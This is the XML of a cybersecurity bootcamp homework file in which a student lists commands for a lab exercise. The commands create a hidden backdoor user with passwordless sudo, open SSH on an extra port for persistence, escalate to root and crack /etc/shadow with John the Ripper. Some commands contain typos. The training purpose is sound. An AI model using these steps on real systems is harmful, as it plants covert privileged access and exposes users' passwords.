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2d58ac3d4s6x"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>Week 6 Homework Submission File: Advanced Bash - Owning the System</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="240" w:after="240"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Please edit this file by adding the solution commands on the line below the prompt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="240" w:after="240"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Save and submit the completed file for your homework submission.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Step 1: Shadow People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/>
        <w:t>Create a secret user named sysd. Make sure this user doesn't have a home folder created: adduser sysd -no-create-home -uid 11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/>
        <w:t>Give your secret user a password: passw0rd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="240" w:after="240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/>
        <w:t xml:space="preserve">Give your secret user a system UID &lt; 1000: see number one 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Give your secret user the same GID: groupadd -g 11 sysd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Give your secret user full sudo access without the need for a password: suod visudo    then   sysd ALL=(ALL) NOPASSWD:ALL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/>
        <w:t xml:space="preserve">Test that sudo access works without your password: su sysd    then    sudo -l </w:t>
        <w:br/>
        <w:br/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Step 2: Smooth Sailing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="240" w:before="240" w:after="240"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Edit the sshd_config file: nano /etc/ssh/sshd_config   take the # off Port 22 and add Port 2222 on the next line </w:t>
        <w:br/>
        <w:br/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Step 3: Testing Your Configuration Update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/>
        <w:t xml:space="preserve">Restart the SSH service:service sshd restart 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 xml:space="preserve">Exit the root account: exit and another exit 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SSH to the target machine using your sysd account and port 2222: ssh sysd@192.168.6.105 -p 2222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/>
        <w:t xml:space="preserve">Use sudo to switch to the root user: sudo su root </w:t>
        <w:br/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Step 4: Crack All the Passwords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/>
        <w:t>SSH back to the system using your sysd account and port 2222: ssh sysd@192.168.6.105 -p 2222</w:t>
        <w:br/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/>
        <w:t xml:space="preserve">Escalate your privileges to the root user. Use John to crack the entire /etc/shadow file: sudo su root then john /etc/shadow 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v-text-anchor:middle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spacing w:lineRule="auto" w:line="240" w:before="240" w:after="240"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>© 2020 Trilogy Education Services, a 2U, Inc. brand. All Rights Reserved.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LibreOffice/7.0.1.2$Windows_X86_64 LibreOffice_project/7cbcfc562f6eb6708b5ff7d7397325de9e764452</Application>
  <Pages>2</Pages>
  <Words>262</Words>
  <Characters>1223</Characters>
  <CharactersWithSpaces>1485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